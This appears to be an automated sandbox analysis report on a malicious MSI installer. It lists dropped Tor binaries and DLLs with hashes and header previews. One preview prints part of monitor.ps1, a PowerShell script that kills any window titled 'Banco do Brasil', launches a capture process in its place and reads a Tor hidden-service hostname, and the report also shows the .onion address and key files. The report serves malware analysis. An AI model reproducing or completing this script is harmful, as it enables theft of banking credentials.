                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!...#...........................h.................................B....@... ..........................Y......4............................P..X&..........................dj......................L................................text...............................`.P`.data...............................@.`..rdata..P...........................@.`@.bss..................................`..edata...Y.......Z...p..............@.0@.idata..4...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..X&...P...(..................@.0B/4..................................@.@B/19.....;".......$..................@..B/31......Y.......Z...4..............@..B/45.......... ......................@..B/57..................z..............@.0B/70.....(....0......................@..B/81.....H]...@...^......
                                                C:\ProgramData\Leitor\libevent_core-2-1-7.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):975436
                                                Entropy (8bit):6.216593168771383
                                                Encrypted:false
                                                SSDEEP:24576:aYz/U9dYQv6wbSVliNPzIqENbtFXrFKtSRvwwfu:1Za6wbSV4NPzIqENTXrFKtIvG
                                                MD5:686C6A9DA6767287BF2E2126574FAFEA
                                                SHA1:2B0BE53C4AD4B67ECDFDCD97A717DE5A617F9EF0
                                                SHA-256:ABDC8CFB39D1431A1E740CF9DB2BBD604CDB7A4ED79E7E0A68D814E32A296164
                                                SHA-512:3CDE56FF25E53A9A04B5459113C89B8562C01B0F93E39C56BD6536824488F4F9347929935056012ADAA4982CBB8A39B61CE2F17CF92ECF02295AB1A922CD4DD4
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........-......!...#.J...................`....0n................................F.....@... .........................i<...0...............................`..............................$........................2..H............................text...TI.......J..................`.P`.data........`.......P..............@.`..rdata..<V...p...X...T..............@.`@.bss..................................`..edata..i<.......>..................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B/4..................................@.@B/19.................................@..B/31.....}W.......X...8..............@..B/45.....p...........................@..B/57..................z..............@.0B/70.......... ......................@..B/81......[...0...\......
                                                C:\ProgramData\Leitor\libevent_extra-2-1-7.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):683256
                                                Entropy (8bit):6.173131714749706
                                                Encrypted:false
                                                SSDEEP:12288:39gDBeIO2+MMF5lDeXfzxjgtSMStxEX6eg5bTCubl:meh2JMF5lqXfzxUbStyX6eKnCubl
                                                MD5:070F988B98E9717BBD5E870A4F8C1611
                                                SHA1:17FB4C990C13A4FB0A2181FE139D3515FF8D96F6
                                                SHA-256:9DEB6F1776DB51FA7E4E89AD2779A9F07E9F22FCB5E24481FAA291D2D27E43FE
                                                SHA-512:C83D793BBE26E0297F9726B32CAD5BE3F92DBC36717C143FF7D55B7BD7BB20324FD86594BC626A374252656C3EE187FA4DCA4C3933FE19952894042B2127A6FD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!...#.$...................@.....d......................................@... .................................$...............................P...........................D~.......................................................text...$".......$..................`.P`.data...4....@.......*..............@.`..rdata..\A...P...B...,..............@.`@.bss.... .............................`..edata........... ...n..............@.0@.idata..$...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..P...........................@.0B/4......P....0......................@.@B/19.....0+...@...,..................@..B/31.....z?...p...@..................@..B/45..................0..............@..B/57.....t....`......................@.0B/70.................................@..B/81.....D...............
                                                C:\ProgramData\Leitor\libgcc_s_sjlj-1.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1095418
                                                Entropy (8bit):6.031576353424405
                                                Encrypted:false
                                                SSDEEP:12288:yWgvC0/HECgnPAPQPtPTPSP7PaadQ2XDPcP8PwPhP5PhP4aEPzPaPugAPnPFgtPD:tmC0/yKX1JzUBDLTl3Ibzz2rnuNY
                                                MD5:BD40FF3D0CE8D338A1FE4501CD8E9A09
                                                SHA1:3AAE8C33BF0EC9ADF5FBF8A361445969DE409B49
                                                SHA-256:EBDA776A2A353F8F0690B1C7706B0CDAFF3D23E1618515D45E451FC19440501C
                                                SHA-512:404FB3C107006B832B8E900F6E27873324CD0A7946CDCCF4FFEEA365A725892D929E8B160379AF9782BCD6CFEB4C3C805740E21280B42BB2CE8F39F26792E5A1
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........k......!...#.:...j...............P.....m.........................@............@... .................................................................d............................f......................................................text....8.......:..................`.P`.data...(....P.......@..............@.0..rdata.......`.......B..............@.`@.bss..................................0..edata...............T..............@.0@.idata...............`..............@.0..CRT....,............f..............@.0..tls.................h..............@.0..reloc..d............j..............@.0B/4......H............p..............@.@B/19.....t...........................@..B/31.....a............,..............@..B/45......g...p...h..................@..B/57.....\).......*...Z..............@.0B/70.................................@..B/81.....=....0..........
                                                C:\ProgramData\Leitor\libssl-1_1.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1106247
                                                Entropy (8bit):6.189020449469006
                                                Encrypted:false
                                                SSDEEP:24576:mGCAHhCGlXKtc/LuaO88CJcpi9OTXu1UYaBQfPlawVzmkmNXtyRi0H4Ine3/Z0OX:ZCA5DuaOWJUu1UYaBQfPQwVzmkmNXtyk
                                                MD5:9E3D55FBF890C6CBFFD836F2AEF4BA31
                                                SHA1:715890BA3BDA3431470CCA4F4BC492C0F63FA138
                                                SHA-256:E6F4CF41373E8770C670CF5E85461F25385314ED9D8A2B37381BC84F5C0DD5C0
                                                SHA-512:9848F28FD96C21DD054CBF3E722E56373696C1F7803C137AFC7C7203325D9738FA6B984D95CD49FF78A6D95C8F9406F869AF3C3783901DA3CC003E2B09497D65
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........G......!...#..................... .....j.........................`...........@... .........................3@......|>...0.......................@...C...........................L.......................................................text...d...........................`.P`.data....,... ......................@.`..rdata.......P.......:..............@.`@.bss....X....p........................`..edata..3@.......B...V..............@.0@.idata..|>.......@..................@.0..CRT....,...........................@.0..tls......... ......................@.0..rsrc........0......................@.0..reloc...C...@...D..................@.0B/4...................$..............@.@B/19.............. ...(..............@..B/31......7.......8...H..............@..B/45.................................@..B/57.................................@.0B/70.....................
                                                C:\ProgramData\Leitor\libssp-0.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):252871
                                                Entropy (8bit):5.911389655551474
                                                Encrypted:false
                                                SSDEEP:6144:DZRBjnF7ModBbDCdcJfstxzeo51aU6grhog4MmwYq55:1BJlDSkYzzugduM5
                                                MD5:B77328DA7CEAD5F4623748A70727860D
                                                SHA1:13B33722C55CCA14025B90060E3227DB57BF5327
                                                SHA-256:46541D9E28C18BC11267630920B97C42F104C258B55E2F62E4A02BCD5F03E0E7
                                                SHA-512:2F1BD13357078454203092ED5DDC23A8BAA5E64202FBA1E4F98EACF1C3C184616E527468A96FF36D98B9324426DDDFA20B62B38CF95C6F5C0DC32513EBACE9E2
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........z.........!...#.....2...............0.....h.........................@......q.....@... ......................`..i....p...............................................................@.......................p...............................text...............................`.P`.data...$....0......."..............@.0..rdata..h....@.......$..............@.0@.bss....d....P........................0..edata..i....`.......*..............@.0@.idata.......p.......,..............@.0..CRT....,............2..............@.0..tls.................4..............@.0..reloc...............6..............@.0B/4...................8..............@.@B/19..................<..............@..B/31.................................@..B/45......'.......(...0..............@..B/57..................X..............@.0B/70..................`..............@..B/81..................d..
                                                C:\ProgramData\Leitor\libwinpthread-1.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):525113
                                                Entropy (8bit):6.099620174174238
                                                Encrypted:false
                                                SSDEEP:12288:/+Pm3Yv9CUauItmEz8HHLOA/TqlDCQdz9bVMPxTivFg:2Pm3Yv9CUauItmEz8HHLOA/TqluQdz9c
                                                MD5:19D7CC4377F3C09D97C6DA06FBABC7DC
                                                SHA1:3A3BA8F397FB95ED5DF22896B2C53A326662FCC9
                                                SHA-256:228FCFE9ED0574B8DA32DD26EAF2F5DBAEF0E1BD2535CB9B1635212CCDCBF84D
                                                SHA-512:23711285352CDEC6815B5DD6E295EC50568FAB7614706BC8D5328A4A0B62991C54B16126ED9E522471D2367B6F32FA35FEB41BFA77B3402680D9A69F53962A4A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X..W......!...#.....6.....................d.................................)....@... ...................................... ..P....................0......................................................t...8............................text.............................. .P`.data...H...........................@.0..rdata..4...........................@.0@.bss..................................0..edata..............................@.0@.idata..............................@.0..CRT....0...........................@.0..tls................................@.0..rsrc...P.... ......................@.0..reloc.......0......................@.0B/4...........@......................@.@B/19.....$....P......................@..B/31.....|D...@...F..................@..B/45.................................@..B/57.....$0...0...2..................@.0B/70..........p..........
                                                C:\ProgramData\Leitor\monitor.ps1
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1688
                                                Entropy (8bit):5.279662107471557
                                                Encrypted:false
                                                SSDEEP:48:Dxc+6tOtDN95xLoXU8+IDp9frUr4KS692MEX+uCZGYiRIiGLaDr+:DxdpN34VSNsiZGY9yX+
                                                MD5:DD2C9A2529B9DB000E30FE0331F6FFAA
                                                SHA1:B7B89DC1E05479D421153EF5109DC72319C3943E
                                                SHA-256:EEF8C513B78DBE60D5FD2793052F7B29151B96D53A513BF6F2A27AB205A64B14
                                                SHA-512:E359DF6B0B7774E32522BF66932E4DD9561A5CBEA9F982369AB52FB1D51A4B7AD4AD5BAE6747717E126B6B14AB0018AA88B7EFB105E37CA6BCBDE140F60140F9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: Add-Type -AssemblyName System.Web....$capturerFileName = $args[0]....$domain = $args[1]....Start-Job -ArgumentList $capturerFileName,$(Get-Location) -ScriptBlock {...$capturerProcess = $null......for(;;) {....$processList = Get-Process | Select-Object Id,MainWindowTitle.......foreach($process in $processList) {.....$title = $process.MainWindowTitle.........if ($title -like "*Banco do Brasil*") {.........Stop-Process -Id $process.Id -Force............#............if (!($capturerProcess -eq $null)) {.......Stop-Process -Id $capturerProcess.Id -Force......}............#............$capturerProcess = Start-Process -FilePath $args[0] -WorkingDirectory $args[1] -PassThru...........break.....}....}.......Start-Sleep -Milliseconds 100...}..}....#....$dataPath = "data"..$data = ""....For (;$data -eq "";) {....if (Test-Path -Path $dataPath) {....$data = Get-Content -Path $dataPath...}......Start-Sleep -Milliseconds 100..}....#....$onionHostPath = "$($env:ProgramData)\hscore\hostname"..$onionHost
                                                C:\ProgramData\Leitor\tor-gencert.exe
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):1055232
                                                Entropy (8bit):6.432409650276543
                                                Encrypted:false
                                                SSDEEP:12288:EPmsFdKwDufqHtWxf9d+UDlh3CUrvVX7:cYwDufqHtWlXvlh35VL
                                                MD5:86585D1FEFE502AF61CC1AC83502D73D
                                                SHA1:92F5EA6539EDC25B7A43E5E62967941670F1CFD0
                                                SHA-256:7332B6E43206F54085B1CA61D6B8920E11E0F94D2AC82BBCBD852F378D703A77
                                                SHA-512:8EA093BFF34E768D33196441EA25A7EABAE9E0CA1DEF49EDDB018D8803D55D326D2624FCF9018225162720F8DDC97FE32E39F5AED711978BD46B3EC364B96154
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................................................@..........................`...........@... .............................................................. ..4>..........................dh..........................4............................text...............................`.P`.data...(...........................@.`..rdata...M.......N...j..............@.`@.bss..................................`..idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..4>... ...@..................@.0B................................................................................................................................................................................................................................................................................................................
                                                C:\ProgramData\Leitor\tor.exe
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):4229632
                                                Entropy (8bit):6.445770642858094
                                                Encrypted:false
                                                SSDEEP:98304:nQcSbHtBsdxf/78Xd1U7hFndQI7yPr5L9E:QXHtBsPj8XdwndQIm
                                                MD5:67AB12CF6CABC14588E4F51B21C2134A
                                                SHA1:32A4FF564F38BF4B62007E419F19C991E60D6E14
                                                SHA-256:F0AAAE0364306BB7A4681D01935C96C2AC76B3576B7982990F86BCAF811A45BA
                                                SHA-512:2A1C67E9D23D6B050E35C5A8E159309CF598095239406C60A9F721FDDC912E21AFAB7036CBD9F77197CC4241DF5F8FA6AA9D7294762659178C6EDEB4699D5BEC
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................0...@..^............0...@..........................0A.....|9A...@... ...............................>..5...........................0?.0............................?;.....................,.>.(............................text...$.0.......0.................`.P`.data........0.......0.............@.`..rdata.......`1......L1.............@.`@.bss.....]...p>.......................`..idata...5....>..6...\>.............@.0..CRT....4.....?.......>.............@.0..tls......... ?.......>.............@.0..reloc..0....0?.......>.............@.0B................................................................................................................................................................................................................................................................................................................
                                                C:\ProgramData\Leitor\zlib1.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):124416
                                                Entropy (8bit):6.479923939252401
                                                Encrypted:false
                                                SSDEEP:3072:HW7e1dL7Om0iXQmWfBoUSIgTBfHJNj9jjjjjjKeDEcz:HWCdLd4fBoUSIgTBxNj9jjjjjjKeDEc
                                                MD5:6F98DA9E33CD6F3DD60950413D3638AC
                                                SHA1:E630BDF8CEBC165AA81464FF20C1D55272D05675
                                                SHA-256:219D9D5BF0DE4C2251439C89DD5F2959EE582E7F9F7D5FF66A29C88753A3A773
                                                SHA-512:2983FAAF7F47A8F79A38122AA617E65E7DEDDD19BA9A98B62ACF17B48E5308099B852F21AAF8CA6FE11E2CC76C36EED7FFA3307877D4E67B1659FE6E4475205C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...#.r.........................c.........................`.......3....@... .........................|............@.......................P..............................d.......................@................................text...tp.......r..................`.P`.data...H............v..............@.0..rdata...O.......P...x..............@.`@.bss..................................`..edata..|...........................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.........0......................@.0..rsrc........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                C:\ProgramData\hscore\hostname (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):4.622828664259099
                                                Encrypted:false
                                                SSDEEP:3:WPcPH/PJElIWg/DMh4LO49vn:WkPnKlIf/DW4rv
                                                MD5:68B03E90B440CC3090D34F5E380945AF
                                                SHA1:C0F571C01F0B0FF1EAAA79D71ECBB56E9506F54C
                                                SHA-256:E6DBB3EDC221DE52E879179E6409429BECA2D27F6460AA3D5B1A75DFD703F32D
                                                SHA-512:D95E22FDA14B015232431210EBC863125F94143C79D6458700546EF99480F5DB55BEC9F608B7A74B277CF5A464A7FBEF7F765026115EA78F3606814E754F7ADD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: tdsq33q6hcygiooykiiojh56ofxawsc5l232c6utpv5ufibdqlbnn5qd.onion..
                                                C:\ProgramData\hscore\hostname.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):4.622828664259099
                                                Encrypted:false
                                                SSDEEP:3:WPcPH/PJElIWg/DMh4LO49vn:WkPnKlIf/DW4rv
                                                MD5:68B03E90B440CC3090D34F5E380945AF
                                                SHA1:C0F571C01F0B0FF1EAAA79D71ECBB56E9506F54C
                                                SHA-256:E6DBB3EDC221DE52E879179E6409429BECA2D27F6460AA3D5B1A75DFD703F32D
                                                SHA-512:D95E22FDA14B015232431210EBC863125F94143C79D6458700546EF99480F5DB55BEC9F608B7A74B277CF5A464A7FBEF7F765026115EA78F3606814E754F7ADD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: tdsq33q6hcygiooykiiojh56ofxawsc5l232c6utpv5ufibdqlbnn5qd.onion..
                                                C:\ProgramData\hscore\hs_ed25519_public_key (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):5.538909765557392
                                                Encrypted:false
                                                SSDEEP:3:16GGRAAYlLPdA30v4DY8nn:XuAAYlzdAkv4E8nn
                                                MD5:4D8D5849BEF847D2985DEA2C4011954E
                                                SHA1:B0DEA555E498A19DE8F4347BD6B1C87CA21DFC55
                                                SHA-256:195072C824C4EB63A78D9D3261AC7189B44D386CD5A5846902DD43053BE8E505
                                                SHA-512:21A838D53D19F79C9FB0C49F3CD4D94C918901AB4BE115D9C24890D5E7D1036C75A71F7C416F5669C99D881B7A702E89025F53BAC772D674A672136836120751
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: == ed25519v1-public: type0 ==........8.d9.R..qn.H]^..z.}{B.#..
                                                C:\ProgramData\hscore\hs_ed25519_public_key.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):5.538909765557392
                                                Encrypted:false
                                                SSDEEP:3:16GGRAAYlLPdA30v4DY8nn:XuAAYlzdAkv4E8nn
                                                MD5:4D8D5849BEF847D2985DEA2C4011954E
                                                SHA1:B0DEA555E498A19DE8F4347BD6B1C87CA21DFC55
                                                SHA-256:195072C824C4EB63A78D9D3261AC7189B44D386CD5A5846902DD43053BE8E505
                                                SHA-512:21A838D53D19F79C9FB0C49F3CD4D94C918901AB4BE115D9C24890D5E7D1036C75A71F7C416F5669C99D881B7A702E89025F53BAC772D674A672136836120751
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: == ed25519v1-public: type0 ==........8.d9.R..qn.H]^..z.}{B.#..
                                                C:\ProgramData\hscore\hs_ed25519_secret_key (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):96
                                                Entropy (8bit):5.998872266278551
                                                Encrypted:false
                                                SSDEEP:3:16GGx6qAYlOBHLIylE1D0mhbpuRdiBVhb7:XwAYlOpzeJZ8Rdih
                                                MD5:FB030F4D0E44F71B55CB3A86D5460306
                                                SHA1:C285C60AE5E61C22D161E220808EE1CA4E9F1C01
                                                SHA-256:2CC2DF47F45AC4FC6B973A31F1597F635B141983388629119EC71BA21B2BE5C5
                                                SHA-512:EDA4EAAE1ED3FA07F0CD779D561221E8A9F7C2EC181C656D9975A341B24B1BB213E76DE55E602E0F922DF904B74316EEDA9010513BC6F5109FC0935B24EA5EC5
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: == ed25519v1-secret: type0 ==...H..f.?.-.gT,.q0.@%.D...P...>..iw...!P....A....SF...-$Ur..-D/...
                                                C:\ProgramData\hscore\hs_ed25519_secret_key.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):96
                                                Entropy (8bit):5.998872266278551
                                                Encrypted:false
                                                SSDEEP:3:16GGx6qAYlOBHLIylE1D0mhbpuRdiBVhb7:XwAYlOpzeJZ8Rdih
                                                MD5:FB030F4D0E44F71B55CB3A86D5460306
                                                SHA1:C285C60AE5E61C22D161E220808EE1CA4E9F1C01
                                                SHA-256:2CC2DF47F45AC4FC6B973A31F1597F635B141983388629119EC71BA21B2BE5C5
                                                SHA-512:EDA4EAAE1ED3FA07F0CD779D561221E8A9F7C2EC181C656D9975A341B24B1BB213E76DE55E602E0F922DF904B74316EEDA9010513BC6F5109FC0935B24EA5EC5
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: == ed25519v1-secret: type0 ==...H..f.?.-.gT,.q0.@%.D...P...>..iw...!P....A....SF...-$Ur..-D/...
                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8003
                                                Entropy (8bit):4.839308921501875
                                                Encrypted:false
                                                SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                MD5:937C6E940577634844311E349BD4614D
                                                SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                                SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                                SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):22600
                                                Entropy (8bit):5.663338822617787
                                                Encrypted:false
                                                SSDEEP:384:9t9yXjGUw0r71MXgKNCYVYlbGeSBKnqAo/AmjKlBKZIO9M4Sa3E2j+gk1kVsJDJo:4p1M5NCzlD4KlozbP1E2j+3iVsZO
                                                MD5:3956148386B00C605F9EB0823FC5E61B
                                                SHA1:5B38ABD9BCBF11EBA8C4ED2D96286C710ABFCF23
                                                SHA-256:28AF515059CC11996B04D6DCB93BF6C2A6D9BCDA40C33C7E87B8421550701D08
                                                SHA-512:981473D2A0AB6C23E143D873FF6B21FF182B890601FFACE84ABAA1A8B2EE700756FBA3269C8D4E835895685AEE7F23A7F39EBFAC721D3DBE830C162B01ED14CB
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: @...e...................h...k.^.P.....h.8.I..........@..........H...............<@.^.L."My...:G..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)*.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,G.....(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                C:\Users\user\AppData\Local\Temp\Pro11.tmp
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):395
                                                Entropy (8bit):2.111361674316822
                                                Encrypted:false
                                                SSDEEP:3:rCL/2F/F9UcRATg/cCRrWFFFFx4VaIIHXUIIFINZ1/X7yfncU2/XDy:GLOnAEkC4/CIBIF81eEHG
                                                MD5:DCCC5F28B39F5F636645E46E04BA9F56
                                                SHA1:980C96692A869A9A9B39B4BE420976BDB4898B98
                                                SHA-256:AE18C7ACC8227B04A25727CBEE47047B4CDBCD589B2226618BCC5EF3532CB0B5
                                                SHA-512:ECE1555FE534646C8DFE459A6F6ACDEABC68C19AE3F31ADC604B662A8CF9C9B79C51EFB018FFA47B717454282F6F996EE5211AB97646F659A060BB2547CD9C0C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .... Directory: C:\......Mode LastWriteTime Length Name ..---- ------------- ------ ---- ..d----- 11/23/2021 9:01 PM JQHPQS ......
                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ahzy01y.me5.psm1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 1
                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c40vmdzw.5rz.psm1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 1
                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1x1xcgg.tti.psm1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 1
                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozbu0pkk.1qs.ps1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 1
                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wddzedzb.jra.ps1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 1
                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zadk52ls.jtp.ps1
